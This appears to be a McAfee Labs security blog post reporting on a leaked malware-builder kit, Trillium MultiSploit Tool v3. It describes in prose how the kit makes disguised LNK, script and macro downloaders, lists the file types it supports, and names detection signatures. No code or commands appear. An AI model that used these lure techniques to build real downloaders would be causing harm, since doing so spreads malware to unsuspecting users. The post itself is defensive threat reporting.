Trillium Toolkit Leads to Widespread Malware

Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.


Trillium was created by a coder using the same name. The program contains a EULA that mentions it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.


In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.


Version 1 of this this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.


This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that uses PowerShell to execute.


This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.

A silent exploit creates a file that downloads and executes a specified file from the Internet. The users have the option to create the following file types:

*.chm,*.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A Powershell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed as hidden, downloads and runs a file.


The Visual Basic executable downloads and executes a file.


The Visual Basic script again downloads and executes a file.


Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro versions, for example:


We have already observed this toolkit being used to distribute malware. We have seen spam campaigns using the macro exploit component, for example:


McAfee has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections seen by malware created by this toolkit.

Introducing McAfee+

Identity theft protection and privacy for your digital life

FacebookLinkedInTwitterEmailCopy Link

Stay Updated

Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.


More from McAfee Labs

Back to top